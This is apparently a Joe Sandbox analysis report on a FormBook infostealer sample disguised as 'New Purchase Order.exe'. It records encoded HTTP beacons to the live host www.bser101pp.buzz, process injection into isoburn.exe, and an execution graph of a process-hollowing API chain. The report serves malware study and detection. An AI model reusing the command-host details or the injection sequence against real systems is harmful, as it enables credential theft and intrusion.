                                                        Data Raw: 48 5a 3d 69 54 66 45 56 2f 47 69 30 4a 6e 51 57 35 73 52 35 32 6a 38 6c 58 31 6a 66 6a 61 6a 4f 54 6b 6c 38 53 44 68 59 46 63 78 2b 75 54 51 30 54 49 37 34 61 5a 48 33 44 65 7a 31 72 44 56 77 41 30 67 71 56 59 73 54 7a 56 64 6d 55 34 73 58 63 4d 55 67 67 31 48 34 49 6f 37 77 78 33 42 54 33 53 73 55 58 71 73 47 35 62 75 39 75 4b 59 48 46 78 45 70 31 2b 63 62 6f 6f 66 5a 71 69 64 67 36 6e 54 6f 44 57 7a 43 71 62 65 50 4a 49 37 61 67 6c 64 31 46 68 4c 44 65 64 53 4b 78 56 69 2b 6c 61 4e 32 46 51 4d 68 4f 47 66 67 77 71 4f 66 59 69 57 43 52 50 49 4c 71 42 6d 4c 4d 4c 37 4e 47 45 79 6c 2f 72 48 68 56 65 4e 49 4b 6b 6e 2f 43 54 38 50 53 44 33 62 45 36 6b 4b 65 41 6e 66 42 69 72 2f 69 58 76 46 4b 47 31 34 5a 75 51 69 38 50 4c 50 61 53 79 32 75 79 6e 48 61 71 55 70 32 45 41 38 64 75 43 30 68 41 39 61 64 6e 62 46 4c 42 66 65 51 67 6e 62 52 51 6c 6f 4c 46 41 58 73 77 50 71 49 76 4f 35 33 53 4f 6a 47 47 67 4a 68 76 68 74 37 4a 36 37 68 4d 44 43 50 33 65 4c 4d 35 46 43 46 51 6f 6d 59 47 45 32 64 76 61 47 35 6d [TRUNCATED]
                                                        Data Ascii: HZ=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uTQ0TI74aZH3Dez1rDVwA0gqVYsTzVdmU4sXcMUgg1H4Io7wx3BT3SsUXqsG5bu9uKYHFxEp1+cboofZqidg6nToDWzCqbePJI7agld1FhLDedSKxVi+laN2FQMhOGfgwqOfYiWCRPILqBmLML7NGEyl/rHhVeNIKkn/CT8PSD3bE6kKeAnfBir/iXvFKG14ZuQi8PLPaSy2uynHaqUp2EA8duC0hA9adnbFLBfeQgnbRQloLFAXswPqIvO53SOjGGgJhvht7J67hMDCP3eLM5FCFQomYGE2dvaG5mRYsHBQihFb3p3W2jezpBR7aCqqew2WkkXtoiholR9tSi0j+3J+rH6Qlan1F8lXD5OkDFfl+TmjyZP/HgcLTIRW4XTUOgEuGvjf6drs7QfYSsUfoq7rGm9R8MIbkcoFtej2DenAJoMnm4JyzALRAES674/LiK9Cd5FlmNUd2z7M8h3cFX15vP7RLL0VZalGGGZKTnPSIvOQCHC+XKvv24RuPIfeiZI4fxHH7ecS33OKebObwZtl7ci0/kvYmS3NouDgfYwtEKezThQ6kaoAa/ZHZBjiWu8NULdUX3Ytq9Kee4i/1R23Wio+3WFqsZVebfEtPnlqPvWClAM3LmIlJBai7SHWLKz+4on3gTl8zX+qyW9tqyHQbt4C09M3BREeoZmC0MOjrUMW7DUCS1fReX2UJ+ZZxFbCNV4LXN62jO/TQJTWFoQIDF3dTegcwmaCe3MPbTVDEmExRhyU50sdLjSlvEs/2yQHd1dT2sAOTLhM+6buWRk+kHnBQa6nGsxM0bAVMCc0htHFfVjThB6omK1c2mlE94dUFDi89IvITrzKt54oZT/dS4KExhUV9sEMUgx3KHGTITeZjf/V2por72GlePltsVz/dt3Q6BRWrYdfgEFurTv2AwfZn+mnLqfJojn2G7N8WGj2zQoYShkpht1roYEwCc2BwVfl [TRUNCATED]
                                                        Dec 3, 2024 14:43:02.373033047 CET974INHTTP/1.1 404 Not Found
                                                        Date: Tue, 03 Dec 2024 13:43:02 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u7uIgTGJkdu0J5HgOFJqIUUOn7OrA3zNodPu%2FLBVXZCLb%2Fy7lOHYkgRmJQqc%2FyjJe04k6iezh0MYSjT2WTb0N7MW9Wr3Y%2BuHGqDolMxVxH0G774%2FeIzar7wjlHZWoauoNuz9ddo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ec3fbbe28fd0f3d-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1551&rtt_var=775&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1674&delivery_rate=0&cwnd=129&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                        Dec 3, 2024 14:43:02.374073982 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12192.168.2.749960104.21.58.9080
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:43:04.540548086 CET371OUTGET /v89f/?HZ=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k3LEpkgrWWSGAJgqoML7k7rmuMTR7pR2QKok4A/6U1dLUrAezCoD2ZYZu&Z4=CrodyR HTTP/1.1
                                                        Host: www.bser101pp.buzz
                                                        Accept: */*
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:43:05.726226091 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Tue, 03 Dec 2024 13:43:05 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ko0cyYGrQDO%2BfemQ5%2BhtwJ4ihE76aAWvG2w0uzpHm%2Fb%2FAkYNunuuwqPVN8gzK%2BHqvpliuptxquDeQfauJKdY8Zeb45GSa0VZSFNRvZYsVhLdme1TvheO691VrIyZrGsSnc9nCGQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8ec3fbd31c69de92-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1495&rtt_var=747&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=371&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                        Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome
                                                        Dec 3, 2024 14:43:05.726242065 CET100INData Raw: 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72
                                                        Data Ascii: friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:08:40:56
                                                        Start date:03/12/2024
                                                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                                                        Imagebase:0xe50000
                                                        File size:814'080 bytes
                                                        MD5 hash:225B541DD84B7D8CBD7CB719A80E4DF9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:08:41:00
                                                        Start date:03/12/2024
                                                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                                                        Imagebase:0xeb0000
                                                        File size:814'080 bytes
                                                        MD5 hash:225B541DD84B7D8CBD7CB719A80E4DF9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:09:49:36
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe"
                                                        Imagebase:0xeb0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:12
                                                        Start time:09:49:39
                                                        Start date:03/12/2024
                                                        Path:C:\Windows\SysWOW64\isoburn.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                        Imagebase:0x80000
                                                        File size:107'008 bytes
                                                        MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:15
                                                        Start time:09:49:54
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe"
                                                        Imagebase:0xeb0000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:17
                                                        Start time:09:50:06
                                                        Start date:03/12/2024
                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                        Imagebase:0x7ff722870000
                                                        File size:676'768 bytes
                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:9.7%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:3.6%
                                                          Total number of Nodes:167
                                                          Total number of Limit Nodes:14
                                                          execution_graph 19901 31278b0 19902 31278ba 19901->19902 19904 3127de8 19901->19904 19905 3127e0d 19904->19905 19909 3127ef8 19905->19909 19913 3127ee8 19905->19913 19911 3127f1f 19909->19911 19910 3127ffc 19911->19910 19917 3127b0c 19911->19917 19914 3127f1f 19913->19914 19915 3127ffc 19914->19915 19916 3127b0c CreateActCtxA 19914->19916 19916->19915 19918 3128f88 CreateActCtxA 19917->19918 19920 312904b 19918->19920 19893 814d680 19894 814d840 19893->19894 19895 814d6a6 19893->19895 19896 814d80a 19895->19896 19898 8149c00 19895->19898 19899 814dd08 PostMessageW 19898->19899 19900 814dd74 19899->19900 19900->19895 19921 312e938 19922 312e980 GetModuleHandleW 19921->19922 19923 312e97a 19921->19923 19924 312e9ad 19922->19924 19923->19922 19925 814bbbf 19926 814bd0c 19925->19926 19927 814bbc9 19925->19927 19930 814c4b0 19927->19930 19949 814c4c0 19927->19949 19931 814c4c0 19930->19931 19932 814c4fe 19931->19932 19968 814cf67 19931->19968 19973 814ca67 19931->19973 19983 814c8b8 19931->19983 19989 814d035 19931->19989 19993 814cc0a 19931->19993 19998 814cd09 19931->19998 20003 814cc69 19931->20003 20013 814cd49 19931->20013 20017 814cb49 19931->20017 20021 814d168 19931->20021 20031 814cba8 19931->20031 20036 814c7e8 19931->20036 20042 814d0cd 19931->20042 20047 814ca43 19931->20047 20052 814cca1 19931->20052 20057 814c8e0 19931->20057 19932->19926 19950 814c4da 19949->19950 19951 814c4fe 19950->19951 19952 814d035 2 API calls 19950->19952 19953 814c8b8 2 API calls 19950->19953 19954 814ca67 4 API calls 19950->19954 19955 814cf67 2 API calls 19950->19955 19956 814c8e0 2 API calls 19950->19956 19957 814cca1 2 API calls 19950->19957 19958 814ca43 2 API calls 19950->19958 19959 814d0cd 2 API calls 19950->19959 19960 814c7e8 2 API calls 19950->19960 19961 814cba8 2 API calls 19950->19961 19962 814d168 4 API calls 19950->19962 19963 814cb49 2 API calls 19950->19963 19964 814cd49 2 API calls 19950->19964 19965 814cc69 4 API calls 19950->19965 19966 814cd09 2 API calls 19950->19966 19967 814cc0a 2 API calls 19950->19967 19951->19926 19952->19951 19953->19951 19954->19951 19955->19951 19956->19951 19957->19951 19958->19951 19959->19951 19960->19951 19961->19951 19962->19951 19963->19951 19964->19951 19965->19951 19966->19951 19967->19951 19969 814ccc9 19968->19969 19970 814ccea 19969->19970 20062 814b3e0 19969->20062 20066 814b3e8 19969->20066 19970->19932 19974 814ca7c 19973->19974 19975 814cec8 19974->19975 19978 814ca43 19974->19978 20078 814b250 19975->20078 20082 814b248 19975->20082 19976 814d37f 19977 814d250 19978->19977 20070 814b1a0 19978->20070 20074 814b198 19978->20074 19985 814c8c4 19983->19985 19984 814c949 19984->19932 19985->19984 20086 814b664 19985->20086 20090 814b670 19985->20090 19991 814b3e0 WriteProcessMemory 19989->19991 19992 814b3e8 WriteProcessMemory 19989->19992 19990 814cc46 19991->19990 19992->19990 19994 814ccab 19993->19994 19995 814d085 19994->19995 19996 814b250 Wow64SetThreadContext 19994->19996 19997 814b248 Wow64SetThreadContext 19994->19997 19996->19994 19997->19994 20000 814ca43 19998->20000 19999 814d250 20000->19999 20001 814b1a0 ResumeThread 20000->20001 20002 814b198 ResumeThread 20000->20002 20001->20000 20002->20000 20004 814cc6f 20003->20004 20005 814cec8 20004->20005 20008 814ca43 20004->20008 20011 814b250 Wow64SetThreadContext 20005->20011 20012 814b248 Wow64SetThreadContext 20005->20012 20006 814d37f 20007 814d250 20008->20007 20009 814b1a0 ResumeThread 20008->20009 20010 814b198 ResumeThread 20008->20010 20009->20008 20010->20008 20011->20006 20012->20006 20015 814b3e0 WriteProcessMemory 20013->20015 20016 814b3e8 WriteProcessMemory 20013->20016 20014 814cd77 20014->19932 20015->20014 20016->20014 20094 814b320 20017->20094 20098 814b328 20017->20098 20018 814cb67 20022 814d16b 20021->20022 20024 814ccab 20022->20024 20026 814ca43 20022->20026 20023 814d250 20025 814d085 20024->20025 20029 814b250 Wow64SetThreadContext 20024->20029 20030 814b248 Wow64SetThreadContext 20024->20030 20026->20023 20027 814b1a0 ResumeThread 20026->20027 20028 814b198 ResumeThread 20026->20028 20027->20026 20028->20026 20029->20024 20030->20024 20032 814cbb9 20031->20032 20102 814b4d1 20032->20102 20106 814b4d8 20032->20106 20033 814cbe4 20038 814c81b 20036->20038 20037 814c949 20037->19932 20038->19932 20038->20037 20040 814b664 CreateProcessA 20038->20040 20041 814b670 CreateProcessA 20038->20041 20039 814ca24 20039->19932 20040->20039 20041->20039 20044 814ca43 20042->20044 20043 814d250 20044->20043 20045 814b1a0 ResumeThread 20044->20045 20046 814b198 ResumeThread 20044->20046 20045->20044 20046->20044 20048 814ca4f 20047->20048 20048->20047 20049 814d250 20048->20049 20050 814b1a0 ResumeThread 20048->20050 20051 814b198 ResumeThread 20048->20051 20050->20048 20051->20048 20053 814ccc9 20052->20053 20055 814b3e0 WriteProcessMemory 20053->20055 20056 814b3e8 WriteProcessMemory 20053->20056 20054 814ccea 20054->19932 20055->20054 20056->20054 20058 814c8e4 20057->20058 20060 814b664 CreateProcessA 20058->20060 20061 814b670 CreateProcessA 20058->20061 20059 814ca24 20059->19932 20060->20059 20061->20059 20063 814b3e8 WriteProcessMemory 20062->20063 20065 814b487 20063->20065 20065->19970 20067 814b430 WriteProcessMemory 20066->20067 20069 814b487 20067->20069 20069->19970 20071 814b1e0 ResumeThread 20070->20071 20073 814b211 20071->20073 20073->19978 20075 814b1a0 ResumeThread 20074->20075 20077 814b211 20075->20077 20077->19978 20079 814b295 Wow64SetThreadContext 20078->20079 20081 814b2dd 20079->20081 20081->19976 20083 814b250 Wow64SetThreadContext 20082->20083 20085 814b2dd 20083->20085 20085->19976 20087 814b670 CreateProcessA 20086->20087 20089 814b8bb 20087->20089 20091 814b6f9 CreateProcessA 20090->20091 20093 814b8bb 20091->20093 20095 814b328 VirtualAllocEx 20094->20095 20097 814b3a5 20095->20097 20097->20018 20099 814b368 VirtualAllocEx 20098->20099 20101 814b3a5 20099->20101 20101->20018 20103 814b4d8 ReadProcessMemory 20102->20103 20105 814b567 20103->20105 20105->20033 20107 814b523 ReadProcessMemory 20106->20107 20109 814b567 20107->20109 20109->20033

                                                          Executed Functions

                                                          Function 03120EED Relevance: 3.9, Strings: 3, Instructions: 170COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 790 3120eed-3120f83 call 31200e4 793 3120f88 790->793 794 3120f8d-3120fa2 793->794 795 3120fa8 794->795 796 31210bc-3121105 call 31200f4 794->796 795->793 795->796 797 3120fe2-3120ff0 795->797 798 3120ff2-3121022 795->798 799 3120fc3-3120fe0 795->799 800 3121097-31210a7 795->800 801 3121027-3121050 795->801 802 3121055-3121061 795->802 803 3121079-3121092 795->803 804 3120faf-3120fb3 795->804 805 31210ac-31210b7 795->805 822 3121107 call 3121a22 796->822 823 3121107 call 3121dc3 796->823 824 3121107 call 3121ff5 796->824 825 3121107 call 31220a8 796->825 826 3121107 call 3121e0f 796->826 827 3121107 call 3121e7c 796->827 797->794 798->794 799->794 800->794 801->794 817 3121069-3121074 802->817 803->794 806 3120fb5-3120fba 804->806 807 3120fbc 804->807 805->794 810 3120fc1 806->810 807->810 810->794 817->794 821 312110d-3121116 822->821 823->821 824->821 825->821 826->821 827->821
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teq$Teq$c+7
                                                          • API String ID: 0-3331098073
                                                          • Opcode ID: b60daead58e8602fb6d8b0a0570d972b0f33dcff538d64bd669847db75dd9fbb
                                                          • Instruction ID: 8e2e144f459a3ad28c124414e8de2d20ea5374b94469e38af7867a397671307d
                                                          • Opcode Fuzzy Hash: b60daead58e8602fb6d8b0a0570d972b0f33dcff538d64bd669847db75dd9fbb
                                                          • Instruction Fuzzy Hash: 5151C272A001658FCB08CF68C895BBEFFB2BF8D300B19856AD545AB255C7309A52CB91
                                                          Function 03120F58 Relevance: 3.9, Strings: 3, Instructions: 131COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 828 3120f58-3120f83 call 31200e4 831 3120f88 828->831 832 3120f8d-3120fa2 831->832 833 3120fa8 832->833 834 31210bc-3121105 call 31200f4 832->834 833->831 833->834 835 3120fe2-3120ff0 833->835 836 3120ff2-3121022 833->836 837 3120fc3-3120fe0 833->837 838 3121097-31210a7 833->838 839 3121027-3121050 833->839 840 3121055-3121061 833->840 841 3121079-3121092 833->841 842 3120faf-3120fb3 833->842 843 31210ac-31210b7 833->843 860 3121107 call 3121a22 834->860 861 3121107 call 3121dc3 834->861 862 3121107 call 3121ff5 834->862 863 3121107 call 31220a8 834->863 864 3121107 call 3121e0f 834->864 865 3121107 call 3121e7c 834->865 835->832 836->832 837->832 838->832 839->832 855 3121069-3121074 840->855 841->832 844 3120fb5-3120fba 842->844 845 3120fbc 842->845 843->832 848 3120fc1 844->848 845->848 848->832 855->832 859 312110d-3121116 860->859 861->859 862->859 863->859 864->859 865->859
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teq$Teq$c+7
                                                          • API String ID: 0-3331098073
                                                          • Opcode ID: b443860d4c34106a54bc015241566dc38c84eebdde8d0d792585057f2cdcf22a
                                                          • Instruction ID: 40fb5c5aaded2c75351489f82d451bbe9a5e31f6bf8be30942b5be0d8ed666bc
                                                          • Opcode Fuzzy Hash: b443860d4c34106a54bc015241566dc38c84eebdde8d0d792585057f2cdcf22a
                                                          • Instruction Fuzzy Hash: 09419375B502258FDB08DFA9C95567EFBB6BF8C200F11812AE516EB354CB708E11CB91
                                                          Function 0814E440 Relevance: 1.9, Strings: 1, Instructions: 604COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 890 814e440-814e462 891 814e812-814e817 890->891 892 814e468-814e4a3 call 814da28 call 814da38 call 814da48 890->892 894 814e821-814e824 891->894 895 814e819-814e81b 891->895 904 814e4a5-814e4af 892->904 905 814e4b6-814e4d6 892->905 897 814e82c-814e834 894->897 895->894 899 814e83a-814e841 897->899 904->905 907 814e4d8-814e4e2 905->907 908 814e4e9-814e509 905->908 907->908 910 814e51c-814e53c 908->910 911 814e50b-814e515 908->911 913 814e53e-814e548 910->913 914 814e54f-814e558 call 814da58 910->914 911->910 913->914 917 814e57c-814e585 call 814da68 914->917 918 814e55a-814e575 call 814da58 914->918 923 814e587-814e5a2 call 814da68 917->923 924 814e5a9-814e5b2 call 814da78 917->924 918->917 923->924 930 814e5b4-814e5b8 call 814da88 924->930 931 814e5bd-814e5d9 924->931 930->931 935 814e5f1-814e5f5 931->935 936 814e5db-814e5e1 931->936 937 814e5f7-814e608 call 814da98 935->937 938 814e60f-814e657 935->938 939 814e5e5-814e5e7 936->939 940 814e5e3 936->940 937->938 946 814e659 938->946 947 814e67b-814e682 938->947 939->935 940->935 950 814e65c-814e662 946->950 948 814e684-814e693 947->948 949 814e699-814e6a7 call 814daa8 947->949 948->949 959 814e6b1-814e6db 949->959 960 814e6a9-814e6ab 949->960 952 814e842-814e881 950->952 953 814e668-814e66e 950->953 961 814e8e0-814e8f0 952->961 962 814e883-814e8a4 952->962 954 814e670-814e672 953->954 955 814e678-814e679 953->955 954->955 955->947 955->950 970 814e6dd-814e6eb 959->970 971 814e708-814e724 959->971 960->959 966 814eac6-814eacd 961->966 967 814e8f6-814e900 961->967 962->961 968 814e8a6-814e8ac 962->968 974 814eadc-814eaef 966->974 975 814eacf-814ead7 call 814d898 966->975 972 814e902-814e909 967->972 973 814e90a-814e914 967->973 976 814e8ae-814e8b0 968->976 977 814e8ba-814e8bf 968->977 970->971 987 814e6ed-814e701 970->987 989 814e726-814e730 971->989 990 814e737-814e75e call 814dab8 971->990 978 814eaf9-814eba0 973->978 979 814e91a-814e95a 973->979 975->974 976->977 982 814e8c1-814e8c5 977->982 983 814e8cc-814e8d9 977->983 1045 814eba1 978->1045 1007 814e972-814e976 979->1007 1008 814e95c-814e962 979->1008 982->983 983->961 987->971 989->990 999 814e776-814e77a 990->999 1000 814e760-814e766 990->1000 1003 814e795-814e7b1 999->1003 1004 814e77c-814e78e 999->1004 1001 814e768 1000->1001 1002 814e76a-814e76c 1000->1002 1001->999 1002->999 1017 814e7b3-814e7b9 1003->1017 1018 814e7c9-814e7cd 1003->1018 1004->1003 1011 814e9a3-814e9bb call 814dbcc 1007->1011 1012 814e978-814e99d 1007->1012 1009 814e964 1008->1009 1010 814e966-814e968 1008->1010 1009->1007 1010->1007 1029 814e9bd-814e9c2 1011->1029 1030 814e9c8-814e9d0 1011->1030 1012->1011 1023 814e7bd-814e7bf 1017->1023 1024 814e7bb 1017->1024 1018->899 1019 814e7cf-814e7dd 1018->1019 1031 814e7ef-814e7f3 1019->1031 1032 814e7df-814e7ed 1019->1032 1023->1018 1024->1018 1029->1030 1033 814e9e6-814ea05 1030->1033 1034 814e9d2-814e9e0 1030->1034 1037 814e7f9-814e811 1031->1037 1032->1031 1032->1037 1042 814ea07-814ea0d 1033->1042 1043 814ea1d-814ea21 1033->1043 1034->1033 1046 